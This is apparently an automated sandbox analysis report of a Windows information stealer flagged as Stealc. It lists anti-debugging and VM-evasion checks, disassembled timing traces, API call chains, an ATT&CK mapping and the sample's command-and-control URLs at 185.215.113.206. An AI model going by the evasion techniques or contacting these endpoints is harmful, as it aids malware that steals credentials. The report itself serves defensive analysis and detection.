                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAE1D second address: 11FAE4D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0DECD24177h 0x0000000a pop edx 0x0000000b jnp 00007F0DECD24168h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jnp 00007F0DECD2416Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAE4D second address: 11FAE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F0DED622D7Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAE63 second address: 11FAE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF1F5 second address: 11FF1FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0DED622D76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF2CE second address: 11FF2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF2D2 second address: 11FF2D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF2D8 second address: 11FF2E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0DECD24166h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF79C second address: 11FF7A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF7A1 second address: 11FF7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F0DECD24168h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dx, si 0x00000027 push eax 0x00000028 mov dh, 5Ah 0x0000002a pop edx 0x0000002b push dword ptr [ebp+122D1CABh] 0x00000031 push esi 0x00000032 sub dword ptr [ebp+12472488h], esi 0x00000038 pop edx 0x00000039 call 00007F0DECD24169h 0x0000003e push esi 0x0000003f pushad 0x00000040 push ebx 0x00000041 pop ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF7EB second address: 11FF7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F0DED622D76h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF7FB second address: 11FF817 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0DECD24166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F0DECD24166h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF817 second address: 11FF839 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0DED622D86h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200D4B second address: 1200D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200D51 second address: 1200D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007F0DED622D7Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200D64 second address: 1200D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200D6A second address: 1200D94 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0DED622D76h 0x00000008 jmp 00007F0DED622D85h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200D94 second address: 1200D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0417 second address: 54F04B6 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 83CFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F0DED622D84h 0x0000000e and esi, 3A780278h 0x00000014 jmp 00007F0DED622D7Bh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F0DED622D86h 0x00000021 push eax 0x00000022 pushad 0x00000023 push ebx 0x00000024 mov ax, FB33h 0x00000028 pop eax 0x00000029 mov bh, CAh 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F0DED622D7Dh 0x00000036 sub eax, 04F29C76h 0x0000003c jmp 00007F0DED622D81h 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007F0DED622D80h 0x00000048 sbb si, 6198h 0x0000004d jmp 00007F0DED622D7Bh 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F04B6 second address: 54F04BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F04BC second address: 54F04C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F04C0 second address: 54F04EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0DECD24175h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F04EA second address: 54F051C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0DED622D88h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F051C second address: 54F0520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0520 second address: 54F0526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0526 second address: 54F052C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F052C second address: 54F0530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F056B second address: 54F0571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0571 second address: 54F0575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0575 second address: 54F05AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F0DECD24174h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F0DECD24170h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F05AD second address: 54F05CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11244CB second address: 11244EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124874 second address: 1124891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DED622D89h 0x00000009 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F6D94E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-39030
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C940F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C8E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C947C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C8F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C81710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C81710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C8DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C94B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C94B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C93B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C93B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C8BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C8EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C8DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C81160 GetSystemInfo,ExitProcess,0_2_00C81160
                Source: file.exe, file.exe, 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW;<
                Source: file.exe, 00000000.00000002.2103784412.0000000001554000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2103784412.0000000001595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37842
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37845
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37857
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37861
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37897
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37731
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C84610 VirtualProtect ?,00000004,00000100,000000000_2_00C84610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C99BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C99BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C99AA0 mov eax, dword ptr fs:[00000030h]0_2_00C99AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C97690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00C97690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3624, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C99790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00C99790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C998E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00C998E0
                Source: file.exe, file.exe, 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC7588 cpuid 0_2_00CC7588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00C97D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C96BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00C96BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C979E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00C979E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C97BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00C97BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.c80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2061051331.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3624, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.c80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2061051331.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3624, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe39%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/405117-2476756634-1003file.exe, 00000000.00000002.2103784412.0000000001554000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.2103784412.0000000001569000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/6c4adf523b719729.php_file.exe, 00000000.00000002.2103784412.0000000001569000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206file.exe, 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.206/~gqfile.exe, 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/wsfile.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/$file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2061051331.000000000539B000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.206
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1544876
                                  Start date and time:2024-10-29 20:42:18 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 19s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 128
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
